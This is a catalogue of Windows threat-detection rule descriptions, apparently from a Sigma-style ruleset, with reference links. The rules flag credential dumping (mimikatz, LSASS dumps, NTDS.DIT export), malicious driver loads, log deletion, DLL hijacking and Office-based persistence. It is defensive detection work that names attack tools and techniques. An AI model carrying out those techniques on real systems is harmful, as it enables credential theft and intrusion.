DNS Query To Ufile.io Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration https://thedfirreport.com/2021/12/13/diavol-ransomware/
DNS Query To Visual Studio Code Tunnels Domain Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://cydefops.com/vscode-data-exfiltration
Malicious Driver Load Detects loading of known malicious drivers via their hash. https://loldrivers.io/
PUA - System Informer Driver Load Detects driver load of the System Informer tool https://systeminformer.sourceforge.io/, https://github.com/winsiderss/systeminformer
Malicious Driver Load By Name Detects loading of known malicious drivers via the file name of the drivers. https://loldrivers.io/
Driver Load From A Temporary Directory Detects a driver load from a temporary directory Internal Research
PUA - Process Hacker Driver Load Detects driver load of the Process Hacker tool https://processhacker.sourceforge.io/
Vulnerable Driver Load By Name Detects the load of known vulnerable drivers via the file name of the drivers. https://loldrivers.io/
Vulnerable HackSys Extreme Vulnerable Driver Load Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
Vulnerable WinRing0 Driver Load Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation https://github.com/xmrig/xmrig/tree/master/bin/WinRing0, https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
WinDivert Driver Load Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows https://reqrypt.org/windivert-doc.html, https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
Vulnerable Driver Load Detects loading of known vulnerable drivers via their hash. https://loldrivers.io/
Credential Manager Access By Uncommon Applications Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Access To Crypto Currency Wallets By Uncommon Applications Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing. Internal Research
Access To Windows Credential History File By Uncommon Applications Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist, https://www.passcape.com/windows_password_recovery_dpapi_credhist
Access To Windows DPAPI Master Keys By Uncommon Applications Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
Access To Potentially Sensitive Sysvol Files By Uncommon Applications Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share. https://github.com/vletoux/pingcastle
Microsoft Teams Sensitive File Access By Uncommon Applications Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process. https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens
File Creation Date Changed to Another Year Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity. https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
Unusual File Modification by dns.exe Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html
Potential PrintNightmare Exploitation Attempt Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://github.com/cube0x0/CVE-2021-1675
Backup Files Deleted Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files
EventLog EVTX File Deleted Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence Internal Research
Exchange PowerShell Cmdlet History Deleted Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Process Deletion of Its Own Executable Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces. https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion
IIS WebServer Access Logs Deleted Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html
PowerShell Console History Logs Deleted Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence Internal Research
Prefetch File Deleted Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence Internal Research, https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/
TeamViewer Log File Deleted Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md
Tomcat WebServer Logs Deleted Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence Internal Research, https://linuxhint.com/view-tomcat-logs-windows/
File Deleted Via Sysinternals SDelete Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. https://github.com/OTRF/detection-hackathon-apt29/issues/9, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md
Unusual File Deletion by Dns.exe Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html
ADS Zone.Identifier Deleted By Uncommon Application Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/, Internal Research
ADSI-Cache File Creation By Uncommon Tool Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961, https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/, https://github.com/fox-it/LDAPFragger
Advanced IP Scanner - File Event Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/, https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://labs.f-secure.com/blog/prelude-to-ransomware-systembc, https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf, https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer
Suspicious Binary Writes Via AnyDesk Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) https://redcanary.com/blog/misbehaving-rats/
Anydesk Temporary Artefact An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
Assembly DLL Creation Via AspNetCompiler Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. Internal Research
BloodHound Collection Files Detects default file names outputted by the BloodHound collection tool SharpHound https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection
EVTX Created In Uncommon Location Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. Note that backup software and legitimate administrator might perform similar actions during troubleshooting. https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key
Creation Of Non-Existent System DLL Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking. https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992, https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/, https://github.com/Wh04m1001/SysmonEoP, https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/, https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc
New Custom Shim Database Created Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory, https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence, https://liberty-shell.com/sec/2020/02/25/shim-persistence/, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/
Suspicious Screensaver Binary File Creation Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md
Files With System DLL Name In Unsuspected Locations Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production. Internal Research
Files With System Process Name In Unsuspected Locations Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production. Internal Research
Creation Exe for Service with Unquoted Path Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md
Cred Dump Tools Dropped Files Files with well-known filenames (parts of credential dump software or files produced by them) creation https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
WScript or CScript Dropper - File Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)
Dynamic CSharp Compile Artefact When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile
CSExec Service File Creation Detects default CSExec service filename which indicates CSExec service installation and execution https://github.com/malcomvetter/CSExec
Potential DCOM InternetExplorer.Application DLL Hijack Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
DLL Search Order Hijackig Via Additional Space in Path Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack https://twitter.com/cyb3rops/status/1552932770464292864, https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
Potentially Suspicious DMP/HDMP File Creation Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
Potential Persistence Attempt Via ErrorHandler.Cmd Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/, https://github.com/last-byte/PersistenceSniper
Suspicious ASPX File Drop by Exchange Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/, https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html, https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
Suspicious File Drop by Exchange Detects suspicious file type dropped by an Exchange component in IIS https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/, https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html, https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
GoToAssist Temporary Installation Artefact An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows
HackTool - CrackMapExec File Indicators Detects file creation events with filename patterns used by CrackMapExec. https://github.com/byt3bl33d3r/CrackMapExec/
HackTool - Typical HiveNightmare SAM File Export Detects files written by the different tools that exploit HiveNightmare https://github.com/GossiTheDog/HiveNightmare, https://github.com/FireFart/hivenightmare/, https://github.com/WiredPulse/Invoke-HiveNightmare, https://twitter.com/cube0x0/status/1418920190759378944
HackTool - Dumpert Process Dumper Default File Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory https://github.com/outflanknl/Dumpert, https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
HackTool - Inveigh Execution Artefacts Detects the presence and execution of Inveigh via dropped artefacts https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs, https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs, https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
HackTool - Mimikatz Kirbi File Creation Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. https://cobalt.io/blog/kerberoast-attack-techniques, https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module. https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40
HackTool - NPPSpy Hacktool Usage Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy, https://twitter.com/0gtweet/status/1465282548494487554
HackTool - Powerup Write Hijack DLL Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/
HackTool - QuarksPwDump Dump File Detects a dump file written by QuarksPwDump password dumper https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. https://github.com/Porchetta-Industries/CrackMapExec, https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
HackTool - SafetyKatz Dump Indicator Detects default lsass dump filename generated by SafetyKatz. https://github.com/GhostPack/SafetyKatz, https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63
Potential Initial Access via DLL Search Order Hijacking Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc, https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0
Installation of TeamViewer Desktop TeamViewer_Desktop.exe is create during install https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows
Malicious DLL File Dropped in the Teams or OneDrive Folder Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/
ISO File Created Within Temp Folders Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022. https://twitter.com/Sam0x90/status/1552011547974696960, https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image
ISO or Image Mount Indicator in Recent Files Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore, https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/, https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/
GatherNetworkInfo.VBS Reconnaissance Script Output Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
LSASS Process Memory Dump Files Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. https://www.google.com/search?q=procdump+lsass, https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml, https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/, https://github.com/helpsystems/nanodump, https://github.com/CCob/MirrorDump, https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35, https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258
LSASS Process Dump Artefact In CrashDumps Folder Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
WerFault LSASS Process Memory Dump Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials https://github.com/helpsystems/nanodump
Octopus Scanner Malware Detects Octopus Scanner Malware. https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
Adwind RAT / JRAT File Artifact Detects javaw.exe in AppData folder as used by Adwind / JRAT https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
File Creation In Suspicious Directory By Msdt.EXE Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
Uncommon File Creation By Mysql Daemon Process Detects the creation of files with scripting or executable extensions by Mysql daemon. Which could be an indicator of "User Defined Functions" abuse to download malware. https://asec.ahnlab.com/en/58878/, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/
Suspicious DotNET CLR Usage Log Artifact Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context. https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/, https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml, https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008, https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html
Suspicious File Creation In Uncommon AppData Folder Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs Internal Research
SCR File Write Event Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. https://lolbas-project.github.io/lolbas/Libraries/Desk/
Potential Persistence Via Notepad++ Plugins Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/
NTDS.DIT Created Detects creation of a file named "ntds.dit" (Active Directory Database) Internal Research
NTDS.DIT Creation By Uncommon Parent Process Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://pentestlab.blog/tag/ntds-dit/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1
NTDS.DIT Creation By Uncommon Process Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/, https://adsecurity.org/?p=2398
NTDS Exfiltration Filename Patterns Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb, https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1, https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405
Office Macro File Creation Detects the creation of a new office macro files on the systems https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
Potential Persistence Via Microsoft Office Add-In Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). Internal Research, https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence, https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md
Office Macro File Download Detects the creation of a new office macro files on the systems via an application (browser, mail client). https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
Office Macro File Creation From Suspicious Process Detects the creation of a office macro file from a a suspicious process https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
OneNote Attachment File Dropped In Suspicious Location Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/
Suspicious File Created Via OneNote Application Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/, https://twitter.com/MaD_c4t/status/1623414582382567424, https://labs.withsecure.com/publications/detecting-onenote-abuse, https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/, https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/
New Outlook Macro Created Detects the creation of a macro file for Outlook. https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/
.RDP File Created by Outlook Process Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use RDP files as attachments. https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/, https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/, https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29
PCRE.NET Package Temp Files Detects processes creating temp files related to PCRE.NET package https://twitter.com/rbmaslen/status/1321859647091970051, https://twitter.com/tifkin_/status/1321916444557365248
Suspicious Outlook Macro Created Detects the creation of a macro file for Outlook. https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53, https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/
Publisher Attachment File Dropped In Suspicious Location Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents https://twitter.com/EmericNasi/status/1623224526220804098
Potential Persistence Via Microsoft Office Startup Folder Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies, https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders
File With Uncommon Extension Created By An Office Application Detects the creation of files with an executable or script extension by an Office application. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
